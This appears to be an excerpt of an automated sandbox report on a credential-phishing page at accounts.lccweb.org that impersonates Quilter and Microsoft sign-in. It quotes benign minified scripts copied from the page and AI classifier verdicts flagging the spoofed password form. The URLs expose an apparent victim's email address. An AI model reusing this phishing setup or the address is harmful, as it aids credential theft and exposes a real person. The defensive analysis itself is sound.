Republic~236!!!TD~Chad~235!!!CL~Chile~56!!!CN~China~86!!!CX~Christmas Island~61!!!CC~Cocos (Keeling) Islands~61!!!CO~Colombia~57!!!KM~Comoros~269!!!CG~Congo~242!!!CD~Congo (DRC)~243!!!CK~Cook Islands~682!!!CR~Costa Rica~506!!!CI~Cte d\u0027Ivoire~225!!!HR~Croatia~385!!!CU~Cuba~53!!!CW~Curaao~599!!!CY~Cyprus~357!!!CZ~Czechia~420!!!DK~Denmark~45!!!DJ~Djibouti~253!!!DM~Dominica~1!!!DO~Dominican Republic~1!!!EC~Ecuador~593!!!EG~Egypt~20!!!SV~El Salvador~503!!!GQ~Equatorial Guinea~240!!!ER~Eritrea~291!!!EE~Estonia~372!!!ET~Ethiopia~251!!!FK~Falkland Islands~500!!!FO~Faroe Islands~298!!!FJ~Fiji~679!!!FI~Finland~358!!!FR~France~33!!!GF~French Guiana~594!!!PF~French Polynesia~689!!!GA~Gabon~241!!!GM~Gambia~220!!!GE~Georgia~995!!!DE~Germany~49!!!GH~Ghana~233!!!GI~Gibraltar~350!!!GR~Greece~30!!!GL~Greenland~299!!!GD~Grenada~1!!!GP~Guad |
| URL: https://e175ea74-3c950dd3.lccweb.org/shared/1.0/co... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a polyfill for the Promise API, which is a common and legitimate practice. While it uses some legacy APIs like `XDomainRequest`, the overall behavior is benign and focused on providing a consistent Promise implementation across different browsers. There are no clear indicators of malicious intent or data exfiltration, so the risk score is relatively low."
} |
/*!
* ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------
*
* This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.
*
* json2.js (2016-05-01)
* https://github.lccweb.org/douglascrockford/JSON-js
* License: Public Domain
*
* Provided for Informational Purposes Only
*
* ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------
*/!function(e){function n(n){for(var t,i,o=n[0],r=n[1],s=0,c=[];s<o.length;s++)i=o[s],Object.prototype.hasOwnProperty.call(a,i)&&a[i]&&c.push(a[i][0]),a[i]=0;for(t in r)Object.prototype.hasOwnProperty.call(r,t)&&(e[t]=r[t]);for(d&&d(n);c.length;)c.shift()()}var t,i={},a={24:0};function o(n){if(i[n])return i[n].exports;var t=i[n]={i:n,l:!1,exports:{}};return e[n].call(t.exports,t,t.exports,o),t.l=!0,t.exports}Function.prototype.bind||(t=Array.prototype.slice,Function.prototype.bind=function(e){if("function"!=typeof this)throw new TypeError("Function.prototype.bind - what is trying to be bound is not callable");var n=t.call(arguments,1),i=n.length,a=this,o=function(){},r=function(){return n.length=i,n.push.apply(n,arguments),a.apply(o.prototype.isPrototypeOf(this)?this:e,n)};return this.prototype&&(o.prototype=this.prototype),r.prototype=new o,r}),document.head=document.head||document.getElementsByTagName("head")[0],function(){function e(n){var t=this,i=0,a=null,o=[];function r(){if(o.length>0){var e=o.slice();o=[],setTimeout((function(){for(var n=0,t=e.length;n<t;++n)e[n]()}),0)}}function s(e){0===i&&(a=e,i=1,r())}function c(e){0===i&&(a=e,i=2,r())}t.then=function(n,t){return new e((function(s,c){!function(n,t,s,c){o.push((function(){var o;try{o=1===i?"function"==typeof n?n(a):a:"function"==typeof t?t(a):a}catch(r){return void c(r)}o instanceof e?o.then(s,c):2===i&&"function"!=typeof t?c(o):s(o)})),0!==i&&r()}(n,t,s,c)}))},t["catch"]=function(e){return t.then(null,e)},function(){if("function"!=typeof n)throw new TypeError("Promise: argument is not a Function object");try{n(s,c)}catch(e){c(e)}}()}function n(e,n,t,i,a){return function(o){e[n]=i?o:a?{status:"fulfilled",value:o}:{status:"rejected",reason:o},t()}}function t(t,i){return t&&t.length?new e((function(a,o){for(var r=[],s=0,c=0,d=t.length;c<d;++c){var l=t[c];if(l instanceof e){s++;var u=function(){0==--s&&a(r)};i?l.then(n(r,c,u,i),o):l.then(n(r,c,u,i,!0),n(r,c,u,i,!1))}else r[c]=l}0===s&&setTimeout((function(){a(r)}),0)})):e.resolve([])}function i(e,n){return function(){e(n)}}e.all=function(e){return t(e,!0)},e.allSettled=function(e){return t(e,!1)},e.race=function(n){return new e((function(t,a){if(n&&n.length)for(var o=0,r=n.length;o<r;++o){var s=n[o];s instanceof e?s.then(t,a):setTimeout(i(t,s),0)}}))},e.reject=function(n){return new e((function(e,t){t(n)}))},e.resolve=function(n){return n instanceof e?n:n&&"function"==typeof n.then?new e((function(e,t){n.then(e,t)})):new e((function(e){e(n)}))},window.Promise||(window.Promise=e),window.Promise.all||(window.Promise.all=e.all),window.Promise.allSettled||(window.Promise.allSettled=e.allSettled),window.Promise.race||(window.Promise.race=e.race),window.Promise.reject||(window.Promise.reject=e.reject),window.Promise.resolve||(window.Promise.resolve=e.resolve)}(),o.e=function(e){var n=[],t=a[e];if(0!==t)if(t)n.push(t[2]);else{var i=new Promise((function(n,i){t=a[e]=[n,i]}));n.push(t[2]=i);var r=window.ServerData,s=r&&r.loader&&r.loader.cdnRoots||[],c=r&&r.slMaxRetry?r.slMaxRetry:s.length-1,d=new Error;var l=function u(n |
| URL: https://accounts.lccweb.org/?sessionID=q6nrva3dnr&... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "The provided JavaScript snippet appears to be a part of a web page loading and debugging utility. It does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or redirects to malicious domains. The script is primarily focused on handling document ready and load events, as well as providing a simple logging mechanism through the `$Debug` object. While it uses some legacy APIs like `XDomainRequest`, these pose minor risks and are not inherently malicious. Overall, this script seems to be a benign utility with no clear signs of malicious intent."
} |
//<![CDATA[
!function(){var e=window,r=e.$Debug=e.$Debug||{},t=e.$Config||{};if(!r.appendLog){var n=[],o=0;r.appendLog=function(e){var r=t.maxDebugLog||25,i=(new Date).toUTCString()+":"+e;n.push(o+":"+i),n.length>r&&n.shift(),o++},r.getLogs=function(){return n}}}(),function(){function e(e,r){function t(i){var a=e[i];if(i<n-1){return void(o.r[a]?t(i+1):o.when(a,function(){t(i+1)}))}r(a)}var n=e.length;t(0)}function r(e,r,i){function a(){var e=!!s.method,o=e?s.method:i[0],a=s.extraArgs||[],u=n.$WebWatson;try{
var c=t(i,!e);if(a&&a.length>0){for(var d=a.length,l=0;l<d;l++){c.push(a[l])}}o.apply(r,c)}catch(e){return void(u&&u.submitFromException&&u.submitFromException(e))}}var s=o.r&&o.r[e];return r=r||this,s&&(s.skipTimeout?a():n.setTimeout(a,0)),s}function t(e,r){return Array.prototype.slice.call(e,r?1:0)}var n=window;n.$Do||(n.$Do={"q":[],"r":[],"removeItems":[],"lock":0,"o":[]});var o=n.$Do;o.when=function(t,n){function i(e){r(e,a,s)||o.q.push({"id":e,"c":a,"a":s})}var a=0,s=[],u=1;"function"==typeof n||(a=n,
u=2);for(var c=u;c<arguments.length;c++){s.push(arguments[c])}t instanceof Array?e(t,i):i(t)},o.register=function(e,t,n){if(!o.r[e]){o.o.push(e);var i={};if(t&&(i.method=t),n&&(i.skipTimeout=n),arguments&&arguments.length>3){i.extraArgs=[];for(var a=3;a<arguments.length;a++){i.extraArgs.push(arguments[a])}}o.r[e]=i,o.lock++;try{for(var s=0;s<o.q.length;s++){var u=o.q[s];u.id==e&&r(e,u.c,u.a)&&o.removeItems.push(u)}}catch(e){throw e}finally{if(0===--o.lock){for(var c=0;c<o.removeItems.length;c++){
for(var d=o.removeItems[c],l=0;l<o.q.length;l++){if(o.q[l]===d){o.q.splice(l,1);break}}}o.removeItems=[]}}}},o.unregister=function(e){o.r[e]&&delete o.r[e]}}(),function(e,r){function t(){if(!a){if(!r.body){return void setTimeout(t)}a=!0,e.$Do.register("doc.ready",0,!0)}}function n(){if(!s){if(!r.body){return void setTimeout(n)}t(),s=!0,e.$Do.register("doc.load",0,!0),i()}}function o(e){(r.addEventListener||"load"===e.type||"complete"===r.readyState)&&t()}function i(){
r.addEventListener?(r.removeEventListener("DOMContentLoaded",o,!1),e.removeEventListener("load",n,!1)):r.attachEvent&&(r.detachEvent("onreadystatechange",o),e.detachEvent("onload",n))}var a=!1,s=!1;if("complete"===r.readyState){return void setTimeout(n)}!function(){r.addEventListener?(r.addEventListener("DOMContentLoaded",o,!1),e.addEventListener("load",n,!1)):r.attachEvent&&(r.attachEvent("onreadystatechange",o),e.attachEvent("onload",n))}()}(window,document),function(){function e(){
return f.$Config||f.ServerData||{}}function r(e,r){var t=f.$Debug;t&&t.appendLog&&(r&&(e+=" '"+(r.src||r.href||"")+"'",e+=", id:"+(r.id||""),e+=", async:"+(r.async||""),e+=", defer:"+(r.defer||"")),t.appendLog(e))}function t(){var e=f.$B;if(void 0===d){if(e){d=e.IE}else{var r=f.navigator.userAgent;d=-1!==r.indexOf("MSIE ")||-1!==r.indexOf("Trident/")}}return d}function n(){var e=f.$B;if(void 0===l){if(e){l=e.RE_Edge}else{var r=f.navigator.userAgent;l=-1!==r.indexOf("Edge")}}return l}function o(e){
var r=e.indexOf("?"),t=r>-1?r:e.length,n=e.lastIndexOf(".",t);return e.substring(n,n+h.length).toLowerCase()===h}function i(){var r=e();return(r.loader||{}).slReportFailure||r.slReportFailure||!1}function a(){return(e().loader||{}).redirectToErrorPageOnLoadFailure||!1}function s(){return(e().loader||{}).logByThrowing||!1}function u(e){if(!t()&&!n()){return!1}var r=e.src||e.href||"";if(!r){return!0}if(o(r)){var i,a,s;try{i=e.sheet,a=i&&i.cssRules,s=!1}catch(e){s=!0}if(i&&!a&&s){return!0}
if(i&&a&&0===a.length){return!0}}return!1}function c(){function t(e){g.getElementsByTagName("head")[0].appendChild(e)}function n(e,r,t,n){var u=null;return u=o(e)?i(e):"script"===n.toLowerCase()?a(e):s(e,n),r&&(u.id=r),"function"==typeof u.setAttribute&&(u.setAttribute("crossorigin","anonymous"),t&&"string"==typeof t&&u.setAttribute("name","")),u}function i(e){var r=g.createElement("link");return r.rel="stylesheet",r.type="text/css",r.href=e,r}function a(e){
var r=g.createElement("script"),t=g.querySelector(" |
| URL: https://accounts.lccweb.org/?sessionID=q6nrva3dnr×tamp=1734453811880&uuid=88ed4498-94c7-406c-9c31-5144420e16ca&username=steven.levin%40quilter.com&sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Cancel",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://accounts.lccweb.org/?sessionID=q6nrva3dnr×tamp=1734453811880&uuid=88ed4498-94c7-406c-9c31-5144420e16ca&username=steven.levin%40quilter.com&sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Cancel",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://accounts.lccweb.org/?sessionID=q6nrva3dnr×tamp=1734453811880&uuid=88ed4498-94c7-406c-9c31-5144420e16ca&username=steven.levin%40quilter.com&sso_reload=true Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
| URL: https://accounts.lccweb.org/?sessionID=q6nrva3dnr×tamp=1734453811880&uuid=88ed4498-94c7-406c-9c31-5144420e16ca&username=steven.levin%40quilter.com&sso_reload=true Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://accounts.lccweb.org/?sessionID=q6nrva3dnr×tamp=1734453811880&uuid=88ed4498-94c7-406c-9c31-5144420e16ca&username=steven.levin%40quilter.com&sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Sign in",
"text_input_field_labels": [
"Password"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://accounts.lccweb.org/?sessionID=q6nrva3dnr×tamp=1734453811880&uuid=88ed4498-94c7-406c-9c31-5144420e16ca&username=steven.levin%40quilter.com&sso_reload=true Model: Joe Sandbox AI | {
"brands": [
"Quilter"
]
} |
|
| URL: https://accounts.lccweb.org/?sessionID=q6nrva3dnr×tamp=1734453811880&uuid=88ed4498-94c7-406c-9c31-5144420e16ca&username=steven.levin%40quilter.com&sso_reload=true Model: Joe Sandbox AI | ```json{ "legit_domain": "quilter.com", "classification": "known", "reasons": [ "The brand 'Quilter' is a known financial services company.", "The URL 'accounts.lccweb.org' does not match the legitimate domain 'quilter.com'.", "The domain 'lccweb.org' does not have any known association with the brand 'Quilter'.", "The presence of a password input field on a non-legitimate domain is suspicious.", "The URL structure does not include any direct reference to 'Quilter', which is a red flag." ], "riskscore": 8}
Google indexed: False |
URL: accounts.lccweb.org
Brands: Quilter
Input Fields: Password |
Edit tour
chrome.exe (PID: 4304 cmdline: 
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node